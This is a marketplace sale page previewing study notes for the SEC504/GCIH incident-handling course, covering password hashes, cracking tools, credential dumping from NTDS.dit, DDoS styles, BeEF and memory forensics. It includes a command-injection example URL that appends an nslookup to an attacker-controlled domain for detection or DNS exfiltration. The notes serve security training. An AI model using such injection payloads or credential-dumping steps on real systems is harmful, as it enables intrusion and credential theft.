Computer Architecture  >  Class Notes  >  Course Notes > SEC504_Notes SANS Technology Institute SEC504/GCIH Notes (All)

Course Notes > SEC504_Notes SANS Technology Institute SEC504/GCIH Notes

Document Content and Description Below

SEC504/GCIH Notes nmap --reason <-- important for understanding why port is open nc -l -p 70000 <-- opens listening port 70000. linux. password cracking toolkit: sprayer toolkit (linux) pw crackin ... g tools: THC Hydra, Burpse Suite.. PW Hashes: Windows: LANMAN, NTLM Linux/Unix: DES, 3DES, MD5, Blowfish, SHA-256, SHA-512 CPU/RAM intensive: bcrypt, scrypt, PBKDF2 NT Hashes are not to be confused with NTLMv1 and v2, an authentication algorithn/protocol. built-in ntdsutil.exe extract NTDS.dit snd SYSTEM hive using Impacket's secretsdump.py script Cain and Able – Windows based pw cracker. Hydra – Linux based pw cracker w/dictionary attacks. Mimikatz – post exploitation tool which dumps PWs from memory. John the Ripper (win/linux/unix)– brute force pw attack in “incremental mode” Single crack mode uses login names, GECOS, full name, fields and users’ home dir. As candidate PWs. External mode leverages program code of some functions to generate candidate PWs. LANMAN – very weak password-hashing mechanism in Server 2003. NTLMv1,v2 – Authentication algorithms, NOT hashing. DDoS Pulsing Zombies – bomb target with traffic for brief period like 10 min. go dormant for some time and go again. Difficult to trace it for the ISP that way. HTTP floods – blends into your overall traffic patterns best and may be very difficult to detect. /etc/shadow - PW Hashes stored on Unix In hashes in this file, the hash is the second colon-delimited field. $6 is used for SHA-512, $5 for SHA-256, $2 Blowfish, and $1 for MD5. Command injection eg.: http://AFinewebpage/cgi-bin/userData.pl?doc=user1.txt; nslookup MyEvilMachine.com. Also, Ping also works. Helps determine if this flaw is present on web server. Attacker can then stiff to see whether DNS requests came from the target for the attacker-controlled DNS server. Can be used to exfiltrate data. BeEF – Browser Exploitation Framework offers modular framework of features for controlling browsers. Must load a “hook” on an XSS-vulnerable site and when a victim access it, his browser contacts the BeEF server and attacker can control that browser with BeEF. RAT apps: Poison Ivy, Gh0st RAT, etc Immunity Debugger – malware debugger for reverse engineering. Rekall - RAM dumping and analysis Netstat -nao | find “ESTABLISHED” – shows local IP and ports, remote address and ports, includes PID. Filtering: select * from pslist() where_EPROCESS.name == “cmd.exe” / EPROCESS.pid ==1492 Dlllist 752, similar to tasklist /m /fi “pid eq 752” [Show More]

Last updated: 2 years ago

Preview 1 out of 3 pages

Buy Now

Instant download

We Accept:

Payment methods accepted on Scholarfriends (We Accept)
Preview image of Course Notes > SEC504_Notes SANS Technology Institute SEC504/GCIH Notes document

Buy this document to get the full access instantly

Instant Download Access after purchase

Buy Now

Instant download

We Accept:

Payment methods accepted on Scholarfriends (We Accept)

Reviews( 0 )

$4.00

Buy Now

We Accept:

Payment methods accepted on Scholarfriends (We Accept)

Instant download

Can't find what you want? Try our AI powered Search

90
0

Document information


Connected school, study & course


About the document


Uploaded On

Jan 12, 2023

Number of pages

3

Written in

All

Seller


Profile illustration for PAPERS UNLIMITED™
PAPERS UNLIMITED™

Member since 4 years

509 Documents Sold

Reviews Received
55
20
8
2
8
Additional information

This document has been written for:

Uploaded

Jan 12, 2023

Downloads

 0

Views

 90

Document Keyword Tags

More From PAPERS UNLIMITED™

View all PAPERS UNLIMITED™'s documents »

Recommended For You

Get more on Class Notes »

$4.00
What is Scholarfriends

Scholarfriends.com Online Platform by Browsegrades Inc. 651N South Broad St, Middletown DE. United States.

We are here to help

We're available through e-mail, Twitter, Facebook, and live chat.
 FAQ
 Questions? Leave a message!

Follow us on
 Twitter

Copyright © Scholarfriends · High quality services·